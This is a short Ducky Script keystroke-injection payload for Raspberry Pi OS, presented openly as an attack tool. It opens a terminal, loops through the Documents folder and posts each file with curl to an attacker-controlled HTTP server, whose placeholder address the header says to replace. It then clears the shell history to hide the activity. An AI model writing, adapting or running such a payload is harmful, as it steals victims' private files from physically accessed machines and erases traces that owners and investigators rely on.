REM ==================================================================
REM Author: fierceoj
REM Description: Upload Documents folder to attacker server
REM Target: Raspberry Pi OS
REM Usage: Change attacker IP/URL and port to yours
REM Usage: Attacker server must be ready to accept HTTP POST requests
REM ==================================================================
DELAY 3000
CTRL-ALT F1
DELAY 200
ENTER 
STRING for f in Documents/*;do curl -F file=@$f http://127.0.0.1:80/;done
DELAY 200
ENTER 
CTRL x
DELAY 200
ENTER
STRING Y
DELAY 200
ENTER
STRING history -c
DELAY 200
ENTER
